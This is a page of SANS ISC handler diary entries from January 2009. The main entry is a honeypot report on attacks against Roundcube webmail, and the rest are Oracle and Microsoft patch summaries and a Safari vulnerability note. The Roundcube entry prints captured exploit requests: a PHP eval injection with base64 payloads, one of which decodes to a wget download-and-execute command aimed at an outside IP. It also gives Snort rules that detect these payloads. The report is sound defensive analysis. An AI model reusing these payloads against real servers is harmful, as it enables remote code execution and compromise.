Threat Level: green Handler on Duty: Rob VandenBrink

SANS ISC InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Roundcube Webmail follow-up

Published: 2009-01-13
Last Updated: 2009-01-15 07:58:08 UTC
by Toby Kohlenberg (Version: 1)
0 comment(s)

ISC Reader David Wharton sent us an excellent follow-up to our previous diary entry - http://isc.sans.org/diary.html?storyid=5599

With his permission I'm simply going to quote his email report rather than try to summarize his excellent work:


As reported previously I set up a pot of honey for the roundcube vulnerability scanners who continue to hit my server. Based on data gathered from that honeypot, I was able to capture their exploit attempt and set up a second stage honeypot, which my colleague Nathan Fowler (submitter of http://isc.sans.org/diary.html?storyid=5599) and I refer to as a "fermented honeypot".

A fermented honeypot is one that has been set up based on exploit attempts identified by a first stage honeypot. What happens is that the attacker(s) get all sticky in the original honeypot and when they come back for more sweetness, they get the fermented honeypot too. Now, along with getting all sticky in the first honeypot, they get all drunk on excitement in the fermented honeypot. To compound matters, most of those who get into the fermented honeypot are script kiddies and as we all know, they are too young to drink. Since script kiddies are delinquents, they jump on the chance to indulge in the fermented honeypot, adding under age drinking to their list of crimes of hacking and compromising systems.

Consequently, the fermentation is not without a vice. Much like over consumption of alcohol the participant experiences a hang-over directly proportional to the high experienced during intoxication. It is during this stage that the fermented honeypot is the most effective, as the attacker realizes through suffering that they've been the victim and the perceived victim is the attacker.

Development of a fermented honeypot is not without effort. There is no typical Win32 click-n-create nonsense. A fermented honeypot must be specifically crafted to correctly emulate the focused attack. The author, or 'brew master', is well capable of taking a traditional honeypot and fermenting it accordingly. This is the first known instance of a fermented honeypot that we know of.

Now that a fermented honeypot has been explained, here is the interesting data captured:

---

POST /roundcube/bin/html2text.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Host: xx.xx.xx.xx
Accept: ZWNobyAoMzMzMjEyKzQzMjQ1NjY2KS4iICI7O3Bhc3N0aHJ1KCJ1bmFtZSAtYTtpZCIpOw==
Content-Length: 54

<b>{${EVAL(BASE64_DECODE($_SERVER[HTTP_ACCEPT]))}}</b>
13:20:52.322589 IP 192.168.1.100.http > 209.160.20.34.33357: P 123078:123416(338) ack 1192 win 96 <nop,nop,timestamp 418993870 456497310>
E....g@.@..;...d...".P.M.f...W5d...`,&.....
..V..5..HTTP/1.1 200 OK
Date: Tue, 13 Jan 2009 19:20:52 GMT
Server: Apache
Last-Modified: Mon, 12 Jan 2009 16:49:04 GMT
ETag: "8c824b-63-4604be2662000"
Accept-Ranges: bytes
Content-Length: 99
Content-Type: text/plain; charset=ISO-8859-1

43578878 Linux lulzserver 2.6.24-22-server #1 SMP Mon Nov 24 19:14:19 UTC 2008 i686 GNU/Linux
root

13:20:52.397462 IP 209.160.20.34.33357 > 192.168.1.100.http: . ack 123416 win 702 <nop,nop,timestamp 456497462 418993870>
E..4.F@.6......"...d.M.P.W5d.f.(....,......
.5.6..V.
13:20:54.407674 IP 209.160.20.34.33357 > 192.168.1.100.http: P 1192:1571(379) ack 123416 win 702 <nop,nop,timestamp 456499424 418993870>
E....G@.6..2..."...d.M.P.W5d.f.(....n......
.5....V.POST /roundcube/bin/html2text.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Host: xx.xx.xx.xx
Accept: cGFzc3RocnUoImNkIC90bXA7d2dldCA4NS4yMTQuNjQuMjI1L3djdWJlO2NobW9kICt4IHdjdWJlOy4vd2N1YmUgPi9kZXYvbnVsbCAyPi9kZXYvbnVsbCAmIik7
Content-Length: 54

<b>{${EVAL(BASE64_DECODE($_SERVER[HTTP_ACCEPT]))}}</b>

---

In both exploits, the payload causes the HTTP Accept Header to be decoded and executed. The second exploit decodes to:

passthru("cd /tmp;wget 85.214.64.225/wcube;chmod +x wcube;./wcube >/dev/null 2>/dev/null &");

This appears to attempt to grab the wcube file from 85.214.64.225 and execute it. Attempts to retrieve that file have met with HTTP 404 responses.

Here are snort rules for the new exploit. These are exploit specific and have not been tested but should do the trick.

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET CURRENT_EVENTS Unknown Roundcube Vulnerability Exploit Attempt 1"; flow:to_server,established; content:"POST /roundcube/bin/html2text.php HTTP/1."; nocase; content:"Accept:
cGFzc3RocnUoImNkIC90bXA7d2dldCA4NS4yMTQuNjQuMjI1L3djdWJlO2NobW9kICt4IHdjdWJlOy4vd2N1YmUgPi9kZXYvbnVsbCAyPi9kZXYvbnVsbCAmIik7"; classtype:exploit_attempt; reference:url,isc.sans.org/diary.html?storyid=5599; sid:2009xxx; rev:1;)

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET CURRENT_EVENTS Unknown Roundcube Vulnerability Exploit Attempt 2"; flow:to_server,established; content:"POST /roundcube/bin/html2text.php HTTP/1."; nocase; content:"passthru(|22|cd /tmp|3B|wget 85.214.64.225/wcube|3B|chmod +x wcube|3B|./wcube >/dev/null 2>/dev/null &|22|)|3B|"; classtype:exploit_attempt; reference:url,isc.sans.org/diary.html?storyid=5599; sid:2009xxx; rev:1;)


UPDATE: Adam Pointon emailed and pointed out that we should have warned that the use of the Accept string in the first snort signature means that it is unlikely to trigger consistently as the string is intended to change in each request. As always be careful to validate signatures no matter where you get them from.

Keywords:
0 comment(s)

The Oracle Patches are here

Published: 2009-01-13
Last Updated: 2009-01-14 00:09:44 UTC
by Toby Kohlenberg (Version: 1)
0 comment(s)

And boy are there a lot of them. The overall patch is listed as CRITICAL and from the details, I would strongly agree.

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html

They have updates for a large number of products. The "full table" link contains links to the update tables containing CVE#, the details of rhe CVSS scoring, protocol, component and version affected.

  • Oracle Database:
    • 10 patch for Oracle Database, none of which are remotely exploitable without authentication
    • 9 patch for Secure Backup, all of the vulnerabilities are remotely exploitable without authentication
    • 1 patch for TimesTen Data Server which is remotely exploitable without authentication
    • Full table here
  • Oracle Application Server:
    • 4 patches, of which 2 are remotely exploitable without authentication
    • Full table here
  • Oracle Collaboration Suite
    • 1 patch which isn't remotely exploitable without authentication
    • Full table here
  • Oracle E-Business Suite and applications
    • 4 patches none of which are remotely exploitable without authentication
    • Full table here
  • Oracle Enterprise Manager
    • 1 patch which isn't remotely exploitable without authentication
    • Full table here
  • Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne
  • BEA Product Suite
    • 5 patches all of which are remotely exploitable without authentication
    • Full table here

 

Keywords:
0 comment(s)

New info disclosure vuln in Safari reported

Published: 2009-01-13
Last Updated: 2009-01-13 23:07:45 UTC
by Toby Kohlenberg (Version: 1)
0 comment(s)

Ismael Valenzuela pointed us at Brian Mastenbrook's blog where he has published a new information disclosure vulnerability in Safari. The vuln potentially allows a malicious website to read files on the local system.

The vulnerability applies to

  • anyone running OS.X 10.5 who have left the system default setting for the RSS feed reader. Which browser you use is irrelevant.
  • Windows users of Safari

According to Brian, Apple hasn't responded to this yet though he claims to have contacted them.

Keywords:
0 comment(s)

January Black Tuesday Overview

Published: 2009-01-13
Last Updated: 2009-01-13 21:12:26 UTC
by Johannes Ullrich (Version: 1)
0 comment(s)

Overview of the January 2009 Microsoft patches (KB article) and their status.

# Affected Contra Indications Known Exploits Microsoft rating ISC rating(*)
clients servers
MS09-001 Vulnerabilities in SMB Could Allow Remote Code Execution

Windows

KB958687
CVE-2008-4114
CVE-2008-4834
CVE-2008-4835

 

no known exploits. Microsoft considers a working exploit unlikely.

Critical Critical Critical
We will update issues on this page for about a week or so as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY
(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute

UPDATE:

ZDI has published (ZDI-09-001ZDI-09-002) notices for these that contain a small amount of additional information beyond what Microsoft has published:

001 refers to CVE-2008-4834 and adds:

"The specific flaw exists in the processing of SMB requests. By specifying malformed values during an NT Trans request an attacker can cause the target system to kernel panic thereby requiring a reboot of the system. Further manipulation can theoretically result in remote unauthenticated code execution."

002 refers to CVE-2008-4835 and adds:

"The specific flaw exists in the processing of SMB requests. By specifying malformed values during an NT Trans2 request an attacker can cause the target system to kernel panic thereby requiring a reboot of the system. Further manipulation can theoretically result in remote unauthenticated code execution."

0 comment(s)

SANS publishes Top 25 most dangerous programming errors

Published: 2009-01-13
Last Updated: 2009-01-13 21:02:05 UTC
by Toby Kohlenberg (Version: 1)
0 comment(s)

Just a quick note in between patch info. SANS has published a list of the "top 25" worst programming errors in terms of security impact. You can read the full details here: http://www.sans.org/top25errors/

Keywords:
0 comment(s)

The Oracle Patches are Coming! The Oracle Patches are Coming!

Published: 2009-01-13
Last Updated: 2009-01-13 19:25:01 UTC
by Toby Kohlenberg (Version: 1)
0 comment(s)

Oracle has posted a pre-release announcement for their January patch release and it looks to be big. To quote Oracle:

"This Critical Patch Update contains 41 security fixes across hundreds of Oracle products.  Some of the vulnerabilities addressed in this Critical Patch Update affect multiple products.  Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply Critical Patch Update fixes as soon as possible.

Vulnerabilities fixed by Critical Patch Updates are scored using the standard CVSS 2.0 scoring (see Oracle's Use of CVSS Scoring). The highest CVSS 2.0 base score of vulnerabilities across all products is 10.0 (These vulnerabilities affect Oracle Secure Backup and WebLogic Server Plugin for Apache, Sun and IIS Web servers)."

 There isn't a tremendous amount of detail yet but here is the list of products with vulnerabilities:

• Oracle Database 11g, version 11.1.0.6
• Oracle Database 10g Release 2, versions 10.2.0.2, 10.2.0.3, 10.2.0.4
• Oracle Database 10g, version 10.1.0.5
• Oracle Database 9i Release 2, versions 9.2.0.8, 9.2.0.8DV
• Oracle Secure Backup version 10.2.0.2, 10.2.0.3
• Oracle Secure Backup version 10.1.0.1, 10.1.0.2, 10.1.0.3
• Oracle TimesTen In-Memory Database version 7.0.5.1.0, 7.0.5.2.0, 7.0.5.3.0, 7.0.5.4.0
• Oracle Application Server 10g Release 3 (10.1.3), version 10.1.3.3.0
• Oracle Application Server 10g Release 2 (10.1.2), versions 10.1.2.2.0, 10.1.2.3.0
• Oracle Collaboration Suite 10g, version 10.1.2
• Oracle E-Business Suite Release 12, version 12.0.6
• Oracle E-Business Suite Release 11i, version 11.5.10.2
• Oracle Enterprise Manager Grid Control 10g Release 4, version 10.2.0.4
• PeopleSoft Enterprise HRMS versions 8.9, 9.0 and 9.1
• JD Edwards Tools version 8.97
• Oracle WebLogic Server (formerly BEA WebLogic Server) 10.0 released through MP1, 10.3 GA
• Oracle WebLogic Server (formerly BEA WebLogic Server) 9.0 GA, 9.1 GA, 9.2 released through MP3
• Oracle WebLogic Server (formerly BEA WebLogic Server) 8.1 released through SP6
• Oracle WebLogic Server (formerly BEA WebLogic Server) 7.0 released through SP7
• Oracle WebLogic Portal (formerly BEA WebLogic Portal) 10.0 released through MP1, 10.2 GA, 10.3 GA
• Oracle WebLogic Portal (formerly BEA WebLogic Portal) 9.2 released through MP3
• Oracle WebLogic Portal (formerly BEA WebLogic Portal) 8.1 released through SP6

Keywords:
0 comment(s)
Diary Archives